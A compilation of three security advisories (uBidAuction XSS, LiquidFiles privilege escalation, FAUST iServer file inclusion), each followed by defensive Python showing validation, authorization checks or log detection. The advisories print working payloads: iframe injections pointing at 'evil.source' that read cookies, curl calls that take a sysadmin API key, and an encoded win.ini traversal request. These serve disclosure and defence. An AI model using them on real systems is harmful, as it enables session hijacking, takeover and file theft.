<pre><code>Document Title:<br />===============<br />uBidAuction v2.0.1 - Multiple XSS Web Vulnerabilities<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2289<br /><br /><br />Release Date:<br />=============<br />2022-01-21<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2289<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.4<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Non Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />uBidAuction is a powerful, scalable & fully-featured classic and bid auction software that lets you create the ultimate<br />profitable online auctions website. It allows you to manage your entire online auction operation: create new auctions within<br />seconds, view members' auctions and use the auction extension settings tool.<br /><br />(Copy of the Homepage: https://www.apphp.com/codemarket/items/48/ubidauction-php-classic-and-bid-auctions-script )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered multiple non-persistent cross site web vulnerabilities in the uBidAuction v2.0.1 script web-application.<br /><br /><br />Affected Product(s):<br />====================<br />ApPHP<br />Product: uBidAuction v2.0.1 - Auction Script (PHP) (Web-Application)<br />Product: ApPHP MVC Framework v1.2.2 (Framework)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-09-01: Researcher Notification & Coordination (Security Researcher)<br />2022-09-02: Vendor Notification (Security Department)<br />2022-09-07: Vendor Response/Feedback (Security Department)<br 
/>2022-**-**: Vendor Fix/Patch (Service Developer Team)<br />2022-**-**: Security Acknowledgements (Security Department)<br />2022-01-21: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Pre Auth (No Privileges or Session)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Responsible Disclosure<br /><br /><br />Technical Details & Description:<br />================================<br />Multiple non-persistent cross site web vulnerabilities have been discovered in the official uBidAuction v2.0.1 script web-application.<br />The vulnerabilities allow remote attackers to inject their own malicious script code via a non-persistent attack vector, compromising<br />browser-to-web-application requests from the client side.<br /><br />The cross site web vulnerabilities are located in the `date_created`, `date_from`, `date_to` and `created_at` parameters of the `filter` web module.<br />The injection point is located in the parameters and the execution occurs in the filter module. 
The request method to inject the malicious script<br />code is GET and the attack vector of the vulnerability is non-persistent on the client side.<br /><br />Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects<br />to a malicious source and non-persistent manipulation of affected application modules.<br /><br />Request Method(s):<br />[+] GET<br /><br />Vulnerable Module(s):<br />[+] ./orders/myOrders<br />[+] ./auctions/myAuctions/status/active<br />[+] ./auctions/myAuctions/status/loose<br />[+] ./posts/manage<br />[+] ./news/manage<br />[+] ./tickets/manage<br />[+] ./auctions/manage<br />[+] ./backend/mailingLog/manage<br /><br />Vulnerable Parameter(s):<br />[+] date_created<br />[+] date_from<br />[+] date_to<br />[+] created_at<br /><br />Affected Module(s):<br />[+] Filter<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The client-side cross site scripting web vulnerabilities can be exploited by remote attackers without an account and with low user interaction.<br />For a security demonstration, or to reproduce the cross site web vulnerability, follow the provided information and steps below.<br /><br /><br />Exploitation: Payload<br />"><iframe+src%3Devil.source+onload</iframe><br /><br /><br />Exploitation: PoC (Role: Member)<br />https://bid-auction.localhost:8080/orders/myOrders?order_number=1&created_at=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&status=0&but_filter=Filter<br />https://bid-auction.localhost:8080/auctions/myAuctions/status/active?auction_number=test1&name=test2&date_from="><iframe+src%3Devil.source+onload&date_to="><iframe+src%3Devil.source<br />https://bid-auction.localhost:8080/auctions/myAuctions/status/active?auction_number=1&name=a&date_from=%22%3E%3Ciframe+src%3Devil.source+onload&date_to=b&auction_type_id=&category_id=&status=&but_filter=Filter<br 
/>https://bid-auction.localhost:8080/auctions/myAuctions/status/active?auction_number=1&name=a&date_from=a&date_to=%22%3E%3Ciframe+src%3Devil.source+onload&auction_type_id=&category_id=&status=&but_filter=Filter<br />https://bid-auction.localhost:8080/auctions/myAuctions/status/loose?auction_number=1&name=a&date_from=a&date_to=%22%3E%3Ciframe+src%3Devil.source+onload&auction_type_id=&category_id=&status=&but_filter=Filter<br />https://bid-auction.localhost:8080/auctions/myAuctions/status/loose?auction_number=1&name=a&date_from=%22%3E%3Ciframe+src%3Devil.source+onload&date_to=b&auction_type_id=&category_id=&status=&but_filter=Filter<br /><br /><br />Exploitation: PoC (Role: Admin)<br />https://bid-auction.localhost:8080/posts/manage?post_header=1&created_at=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&but_filter=Filter<br />https://bid-auction.localhost:8080/news/manage?news_header=1&created_at=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&but_filter=Filter<br />https://bid-auction.localhost:8080/tickets/manage?topic=a&message=a&first_name%2Clast_name=a&departments=0&status=1&date_created=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&but_filter=Filter<br />https://bid-auction.localhost:8080/tickets/manage/status/opened?topic=a&message=a&first_name%2Clast_name=a&departments=0&status=0&date_created=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&but_filter=Filter<br />https://bid-auction.localhost:8080/auctions/manage?auction_number=1&name=a&date_from=%22%3E%3Ciframe+src%3Devil.source+onload&date_to=%22%3E%3Ciframe+src%3Devil.source+onload&auction_type_id=1&category_id=4&status=0&but_filter=Filter<br />https://bid-auction.localhost:8080/backend/mailingLog/manage?email_subject=a&email_content=b&email_from=c&email_to=d&sent_at=%22%3E%3Ciframe+src%3Devil.source+onload&status=&but_filter=Filter<br /><br /><br />Vulnerable Source: ./mailingLog<br /><div 
class="content"><br /><a href="posts/add" class="add-new">Add Post</a><div class="filtering-wrapper"><br /><form id="frmFilterPosts" action="posts/manage" method="get"><br />Post Header: <input id="post_header" style="width:100px;" maxlength="255" type="text" value="avd" name="post_header"><br />Date Created: <input id="created_at" maxlength="255" style="width:80px;" type="text" value=""><iframe src="evil.source" onload="alert(document.cookie)">" name="created_at" /><div class="buttons-wrapper"><br /><input name="" class="button white" onclick="jQuery(location).attr('href','https://bid-auction.localhost:8080/posts/manage');" type="button" value="Cancel" /><br /><input name="but_filter" type="submit" value="Filter" /><br /></div></form></div><br /><br /><br />--- PoC Session Logs (GET) ---<br />https://bid-auction.localhost:8080/auctions/myAuctions/status/active?auction_number=test1&name=test2&date_from="><iframe+src%3Devil.source+onload&date_to="><iframe+src%3Devil.source+onload&auction_type_id=1&category_id=1&status=&but_filter=Filter<br />Host:www.bid-auction-script.com<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Connection: keep-alive<br />Referer:https://bid-auction.localhost:8080/auctions/myAuctions<br />Cookie: apphp_2j9tuqddrg=v1as9gj4qqhakbpgthnrs34np7<br />-<br />GET: HTTP/1.1 200 OK<br />Server: Apache<br />Vary: Accept-Encoding<br />Content-Encoding: gzip<br />Content-Length: 4542<br />Connection: Keep-Alive<br />Content-Type: text/html; charset=utf-8<br /><br /><br />Reference(s):<br />https://bid-auction.localhost:8080/posts/manage<br />https://bid-auction.localhost:8080/orders/myOrders<br />https://bid-auction.localhost:8080/backend/mailingLog/manage<br />https://bid-auction.localhost:8080/auctions/myAuctions/status/loose<br />https://bid-auction.localhost:8080/auctions/myAuctions/status/active<br /><br /><br />Solution - Fix & Patch:<br />=======================<br />The vulnerability can be resolved 
by filtering or securely encoding the vulnerable date_created, date_from, date_to and created_at parameters.<br />Disallow the use of special characters in the affected parameters on GET method requests.<br />Sanitize the vulnerable output location to resolve the point of execution in the filter module.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. 
Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com<br />Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com<br />Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab<br />Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php<br />Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php<br /><br />Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to ask for permission.<br /><br /> Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
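A defender-side illustration of the fix described in the uBidAuction advisory above, added here as an example (not code from the advisory or from ApPHP): strict allowlist validation of the four date filter parameters, and attribute-context encoding of whatever is reflected back into the filter form's `value` attribute. Assumed: the filter expects ISO `YYYY-MM-DD` dates, and the `<input>` markup mirrors the advisory's "Vulnerable Source".

```python
import html
import re
from datetime import date

# Assumption (not from the advisory): the filter form expects ISO dates YYYY-MM-DD.
DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")
DATE_PARAMS = ("date_created", "date_from", "date_to", "created_at")

# The advisory's payload, percent-decoded (constructed here from the PoC URL).
PAYLOAD = '"><iframe src=evil.source onload=alert(document.cookie)>'


def validate_date_param(value):
    """Allowlist check for one filter parameter.

    Returns a datetime.date, or None for an empty (unset) filter. Anything that
    is not a well-formed calendar date is rejected outright, which is the
    "disallow special characters" half of the advisory's fix.
    """
    if value is None or value == "":
        return None
    if not DATE_RE.match(value):
        raise ValueError(f"{value!r} is not a YYYY-MM-DD date")
    return date.fromisoformat(value)  # also rejects 2022-13-45 and the like


def is_valid_date_param(value):
    """Boolean wrapper for callers that must not raise."""
    try:
        validate_date_param(value)
        return True
    except ValueError:
        return False


def validate_filter(params):
    """Validate every date parameter of a filter request; unknown keys are ignored."""
    clean = {}
    for name in DATE_PARAMS:
        if name in params:
            clean[name] = validate_date_param(params[name])
    return clean


def render_vulnerable_input(name, value):
    """The pattern from the advisory's "Vulnerable Source": raw reflection."""
    return (f'<input id="{name}" maxlength="255" style="width:80px;" '
            f'type="text" value="{value}" name="{name}" />')


def render_filter_input(name, value):
    """Render the filter form's <input> with the value encoded for the attribute context.

    html.escape(quote=True) turns the closing double quote of the payload into
    &quot; and the angle brackets into &lt;/&gt;, so the browser keeps the whole
    string inside the value="..." attribute. `name` is a server-side constant
    here, never user input, which is why it is not encoded.
    """
    safe = html.escape("" if value is None else str(value), quote=True)
    return (f'<input id="{name}" maxlength="255" style="width:80px;" '
            f'type="text" value="{safe}" name="{name}" />')


def count_tags(markup):
    """Rough count of element openers, enough to show an attribute breakout."""
    return len(re.findall(r"<[a-zA-Z]", markup))


if __name__ == "__main__":
    print(render_vulnerable_input("created_at", PAYLOAD))  # two tags: input + iframe
    print(render_filter_input("created_at", PAYLOAD))      # one tag: the input only
    print("payload accepted as a date:", is_valid_date_param(PAYLOAD))
    print(validate_filter({"date_from": "2022-01-21", "date_to": "", "name": "a"}))
```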
<pre><code>===============================================================================<br /> title: LiquidFiles Privilege Escalation<br /> product: LiquidFiles v3.5.13<br /> vulnerability type: Privilege Escalation<br /> severity: Medium<br /> CVSSv3 score: 6.7<br /> CVSSv3 vector: AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L<br /> found: 2021-10-29<br /> by: Riccardo Spampinato, Eliana Cannella, Valerio<br />Casalino<br />===============================================================================<br /><br />[EXECUTIVE SUMMARY]<br />LiquidFiles is a secure file transfer system for person-to-person email<br />communication.<br />During an engagement for our customer we discovered a Privilege Escalation<br />from a "User Admin" user to a "System Administrator" user.<br />Using the LiquidFiles API, a "User Admin" user can list all of the application's<br />registered users, retrieving information such as their API keys, including<br />those of the System Administrators. As per the LiquidFiles documentation, the API<br />key is used as HTTP basic authentication in order to authenticate to the<br />LiquidFiles system.<br />A malicious "User Admin" user, by using a System Administrator's API key,<br />can obtain the role of System Administrator and can administer all aspects<br />of the LiquidFiles system.<br />The impact of a successful attack includes obtaining access to all aspects<br />of the LiquidFiles system via the System Administrator API key.<br /><br /><br />[VULNERABLE VERSIONS]<br />The following version of the LiquidFiles system is affected by the<br />vulnerability; previous versions may be vulnerable as well:<br />- LiquidFiles v3.5.13<br /><br /><br />[TECHNICAL DETAILS]<br />It is possible to reproduce the issue by following these steps:<br />1. Get the API key of your own user-admins user;<br />2. With your own user-admins user's API key, get a sysadmins' API key via<br />the /admin/users API;<br />3. 
With the sysadmins' API key retrieved in the previous step, issue the<br />/admin/users/<user-admins_user_id> API call, modifying the group of your<br />user-admins user from "user-admins" to "sysadmins";<br />4. You are now a sysadmins user. You can verify it either by logging in again<br />with your own user via the web GUI (you are now prompted to set a fallback<br />password to use in case LDAP authentication fails) or by issuing the<br />/admin/users/<user-admins_user_id> API call to view your own user.<br /><br /><br />Below is a full transcript of the HTTP requests and responses used to trigger<br />the vulnerability:<br /><br />1. Get the API key of your own user-admins user<br /><br />cURL Request:<br />curl -X POST -H "Accept: application/json" -H "Content-Type: application/json" -d '{"user":{"email":"[user-admins_user_mail]","password":"[CENSORED]"}}' https://[CENSORED]/login<br /><br />Response:<br />{"user":{"api_key":"[user-admins_user_API_key]"}}<br /><br /><br />2. Get a sysadmins' API key<br /><br />cURL Request:<br />curl -s -X GET --user "[user-admins_user_API_key]:x" -H "Accept: application/json" -H "Content-Type: application/json" https://[CENSORED]/admin/users<br /><br />Response:<br />[TRUNCATED]<br />{"user":<br /> {<br /> "id": "[CENSORED]",<br /> "email": "[CENSORED]",<br /> "name": "[CENSORED]",<br /> "group": "sysadmins",<br /> "max_file_size": 0,<br /> "filedrop": "disabled",<br /> "filedrop_email": "disabled",<br /> "api_key": "[sysadmins_user_API_key]",<br /> "ldap_authentication": "false",<br /> "locale": "",<br /> "time_zone": "",<br /> "strong_auth_type": "",<br /> "strong_auth_username": "",<br /> "delivery_action": "",<br /> "phone_number": "",<br /> "last_login_at": "2021-10-29 10:02:11 UTC",<br /> "last_login_ip": "[CENSORED]",<br /> "created_at": "2020-06-30 10:49:38 UTC"<br /> }<br />},<br />[TRUNCATED]<br /><br /><br />3. 
Modify the group of your own user-admins user from "user-admins" to<br />"sysadmins"<br /><br />cURL Request:<br />cat <<EOF | curl -s -X PUT --user "[sysadmins_user_API_key]:x" -H "Accept: application/json" -H "Content-Type: application/json" -d @- https://[CENSORED]/admin/users/<user-admins_user_id><br />{"user":<br /> {<br /> "name": "[user-admins_user_name]",<br /> "group": "sysadmins"<br /> }<br />}<br />EOF<br /><br />Response:<br />{"user":<br /> {<br /> "id": "[CENSORED]",<br /> "email": "[CENSORED]",<br /> "name": "[CENSORED]",<br /> "group": "sysadmins",<br /> "max_file_size": 0,<br /> "filedrop": "disabled",<br /> "filedrop_email": "disabled",<br /> "api_key": "[CENSORED]",<br /> "ldap_authentication": "true",<br /> "locale": "",<br /> "time_zone": "",<br /> "strong_auth_type": "",<br /> "strong_auth_username": "",<br /> "delivery_action": "",<br /> "phone_number": "",<br /> "last_login_at": "2021-11-03 13:31:58 UTC",<br /> "last_login_ip": "[CENSORED]",<br /> "created_at": "2021-03-03 11:48:37 UTC"<br /> }<br />}<br /><br /><br />4. 
Verify that your own user-admins user is now a sysadmins one.<br /><br />cURL Request:<br />curl -X GET -H "Accept: application/json" -H "Content-Type: application/json" --user [user-admins_user_API_key]:x https://[CENSORED]/admin/users/<user-admins_user_id><br /><br />Response:<br />{"user":<br /> {<br /> "id": "[CENSORED]",<br /> "email": "[CENSORED]",<br /> "name": "[CENSORED]",<br /> "group": "sysadmins",<br /> "max_file_size": 0,<br /> "filedrop": "disabled",<br /> "filedrop_email": "disabled",<br /> "api_key": "[CENSORED]",<br /> "ldap_authentication": "true",<br /> "locale": "",<br /> "time_zone": "",<br /> "strong_auth_type": "",<br /> "strong_auth_username": "",<br /> "delivery_action": "",<br /> "phone_number": "",<br /> "last_login_at": "2021-11-03 13:34:36 UTC",<br /> "last_login_ip": "[CENSORED]",<br /> "created_at": "2021-03-03 11:48:37 UTC"<br /> }<br />}<br /><br /><br />[VULNERABILITY REFERENCE]<br />The following CVE ID was allocated to track the vulnerabilities:<br />CVE-2021-43397<br /><br /><br />[DISCLOSURE TIMELINE]<br />2021-11-02 Vulnerability submitted to vendor through vendor support portal.<br /> Vendor requested more info and acknowledged the problem later.<br />2021-11-04 Researcher requested to allocate a CVE number.<br /> Vendor released a fix for the reported issue.<br />2021-11-09 Researcher requested to publicly disclose the issue; public<br /> coordinated disclosure.<br /><br /><br />[MITIGATION]<br />As per the vendor's suggestion, the vulnerability could be mitigated in versions<br />prior to 3.6.3 by disabling the API for the Admins groups.<br /><br /><br />[SOLUTION]<br />Version 3.6.3 (released 2021-11-09)<br />https://man.liquidfiles.com/release_notes/version_3-6-x.html<br /><br /><br />[NOTE]<br />Please note that the issue described in this advisory can also be triggered<br />via the LiquidFiles Admin panel web GUI.<br /><br /><br />[CONTACT DETAILS]<br />Riccardo Spampinato riccardo.spampinato@mail-bip.com +39 348 725 8746<br 
/>Eliana Cannella eliana.cannella@mail-bip.com +39 345 762 2019<br />Valerio Casalino valerio.casalino@mail-bip.com +39 348 824 9794<br /></code></pre>
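A model of the two authorization checks whose absence the LiquidFiles advisory above describes, added here as an example and not LiquidFiles' own code: a user directory listing that never returns another account's `api_key`, and a group change that cannot grant a group above the caller's own. The group names `user-admins` and `sysadmins` are from the advisory; the `users` group, the rank ordering, and all ids and keys are constructed assumptions.

```python
from dataclasses import dataclass

# Group ranks are an assumption for this example; "user-admins" and "sysadmins"
# are the group names from the advisory, "users" is a constructed baseline.
GROUP_RANK = {"users": 0, "user-admins": 1, "sysadmins": 2}


class Forbidden(Exception):
    """Raised when a request would cross a privilege boundary."""


@dataclass
class User:
    id: str
    email: str
    group: str
    api_key: str


def rank(user_or_group):
    group = user_or_group.group if isinstance(user_or_group, User) else user_or_group
    return GROUP_RANK[group]


def serialize_user(user, requester):
    """Build the /admin/users record a caller is allowed to see.

    The credential that lets you *become* an account (api_key) is only ever
    returned for the caller's own account; enumerating a directory must not
    hand out the secrets of equally- or higher-privileged accounts.
    """
    record = {"id": user.id, "email": user.email, "group": user.group}
    if user.id == requester.id:
        record["api_key"] = user.api_key
    return record


def list_users(requester, users):
    """GET /admin/users: admin groups may enumerate, with api_key redacted as above."""
    if rank(requester) < GROUP_RANK["user-admins"]:
        raise Forbidden("only admin groups may list users")
    return [serialize_user(u, requester) for u in users]


def update_group(requester, target, new_group):
    """PUT /admin/users/<id> with a new group.

    Two checks the advisory shows were not enforced: a caller may not touch an
    account ranked above itself, and may not grant a group ranked above its own
    (so a user-admin can never mint a sysadmin, itself included).
    """
    if new_group not in GROUP_RANK:
        raise ValueError(f"unknown group {new_group!r}")
    if rank(requester) < GROUP_RANK["user-admins"]:
        raise Forbidden("only admin groups may change groups")
    if rank(target) > rank(requester):
        raise Forbidden("cannot modify a higher-privileged account")
    if GROUP_RANK[new_group] > rank(requester):
        raise Forbidden(f"cannot grant {new_group!r} above own group {requester.group!r}")
    target.group = new_group
    return target


def can_update_group(requester, target, new_group):
    """Boolean wrapper around update_group for callers that must not raise."""
    try:
        update_group(requester, target, new_group)
        return True
    except Forbidden:
        return False


# Constructed sample directory (placeholder ids and keys, not real values).
SYSADMIN = User("1", "root@example.invalid", "sysadmins", "KEY-SYSADMIN-PLACEHOLDER")
USER_ADMIN = User("2", "helpdesk@example.invalid", "user-admins", "KEY-USERADMIN-PLACEHOLDER")
DIRECTORY = [SYSADMIN, USER_ADMIN]

if __name__ == "__main__":
    for record in list_users(USER_ADMIN, DIRECTORY):
        print(record)  # the sysadmin record carries no api_key
    print("user-admin self-promotion allowed:",
          can_update_group(USER_ADMIN, USER_ADMIN, "sysadmins"))
```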
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220120-0 ><br />=======================================================================<br /> title: Local file inclusion vulnerability<br /> product: Land Software - FAUST iServer<br /> vulnerable version: 9.0.017.017.1-3 - 9.0.018.018.4<br /> fixed version: 9.0.019.019.7, Version 10<br /> CVE number: CVE-2021-34805<br /> impact: high<br /> homepage: https://www.land-software.de<br /> found: 2021-05-25<br /> by: Mario Keck (Atos Germany)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />(translated from German) "The FAUST iServer brings your FAUST, FAUST Entry and LIDOS databases<br />to the intranet and internet. It offers high security and a simple<br />installation."<br /><br />Source: http://www.land-software.de/lfs.fau?prj=iweb&dn=faust+iserver<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a hotfix for the identified vulnerable versions. As the<br />most recent version v10 of FAUST iServer is not vulnerable, no immediate action in<br />the form of a patch is required. The webroot of the server should not be on the<br />same partition as the operating system's root partition.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Local File Inclusion (CVE-2021-34805)<br />When a URL is requested, the FAUST iServer checks for the corresponding ".fau"<br />file on the operating system. ".fau" files can be compared with compiled<br />webserver pages for displaying the content of the webpage. 
The identified<br />vulnerable versions of FAUST iServer do not properly protect against a request<br />aiming to read local files of the operating system.<br /><br />FAUST iServer is designed to work on Windows operating systems only.<br />Therefore, when a path like ..\..\..\windows\win.ini is simply URL-encoded<br />as %2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini, the FAUST iServer returns<br />the contents of win.ini.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Local File Inclusion (CVE-2021-34805)<br />The following proof of concept shows the HTTP request that was used to read<br />local files of the server's operating system.<br />The vulnerability, as shown in the proof of concept request below, can be<br />triggered as soon as a vulnerable version of FAUST iServer is in use. To read<br />operating-system-specific files, the webroot of FAUST iServer has to be located<br />on the same partition as the operating system root.<br />Authorization is not needed.<br /><br />-------------------------------------------------------------------------------<br />HTTP Request:<br />GET /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko<br />Connection: keep-alive<br />Host: <IP><br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.9<br />-------------------------------------------------------------------------------<br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following versions have been tested and found to be vulnerable:<br />* 9.0.017.017.1-3<br />* 9.0.018.018.4<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2021-06-10: Contacting vendor via email.<br />2021-06-14: Vendor requested more information about the vulnerability, 
which<br /> was provided on the same day.<br />2021-06-15: Requested information from vendor to check which versions are<br /> vulnerable.<br />2021-06-17: Vendor informed researcher about upcoming update and promised to<br /> inform all customers about the critical security fix in it.<br />2021-08-09: Confirmed the security fix in FAUST iServer 9.0.019.019.7.<br />2021-08-16: Researcher received a notification mail from the vendor's<br /> newsletter announcing the official release of the fixed version.<br />2022-01-12: Version 10 was officially released and is available for all<br /> customers for upgrade.<br />2022-01-20: Release of security advisory<br /><br /><br />Solution:<br />---------<br />The vulnerability is fixed in the following version:<br />* 9.0.019.019.7<br /><br />This patch should be installed immediately.<br /><br />Version 10 is not affected by this vulnerability; if possible, it is recommended<br />to upgrade to this version.<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. 
The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendations about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested in working with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Mario Keck / @2022<br /><br /><br /></code></pre>
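Detection logic for the traversal pattern in the FAUST iServer advisory above, added here as an example (not the vendor's or SEC Consult's code): it percent-decodes request paths until they are stable, treats backslashes as separators the way Windows does, and flags any request that climbs above the webroot. The log lines are constructed in combined-log format; the traversal requests reuse the advisory's `%5c%2e%2e` encoding, shortened to three steps.

```python
import re
from urllib.parse import unquote

# Combined-log-format request line: client, timestamp, method, path, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample lines (not from the advisory). Line 2 uses the advisory's
# encoding shortened to three steps; line 3 hides the traversal behind a real
# directory; line 4 is double-encoded; line 5 stays inside the webroot.
SAMPLE_LOG = """\
10.0.0.5 - - [25/May/2021:10:12:01 +0200] "GET /start.fau?prj=iweb HTTP/1.1" 200 5120
10.0.0.9 - - [25/May/2021:10:12:07 +0200] "GET /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini HTTP/1.1" 200 403
10.0.0.9 - - [25/May/2021:10:12:09 +0200] "GET /images/..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1" 200 403
10.0.0.9 - - [25/May/2021:10:12:11 +0200] "GET /%252e%252e%255cwindows%255cwin.ini HTTP/1.1" 200 403
10.0.0.5 - - [25/May/2021:10:12:30 +0200] "GET /docs/../index.fau HTTP/1.1" 200 2048
"""


def decode_path(raw, max_rounds=3):
    """Percent-decode until stable so double-encoded %252e%252e is caught too."""
    current = raw
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current


def escapes_webroot(url_path):
    """True if the request path climbs above the webroot.

    FAUST iServer runs on Windows, so a backslash is a separator as well as a
    slash. Walk the segments and track depth: any '..' that would take the
    depth below zero leaves the webroot, whatever encoding was used.
    """
    path = decode_path(url_path.split("?", 1)[0]).replace("\\", "/")
    depth = 0
    for segment in path.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def scan_log(text):
    """Return (client, path, status) for every traversal attempt in the log."""
    hits = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        client, _timestamp, _method, path, status = match.groups()
        if escapes_webroot(path):
            hits.append((client, path, int(status)))
    return hits


if __name__ == "__main__":
    # A 200 on a path that leaves the webroot is the signal worth alerting on.
    for client, path, status in scan_log(SAMPLE_LOG):
        print(f"{client} -> {decode_path(path)} ({status})")
```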
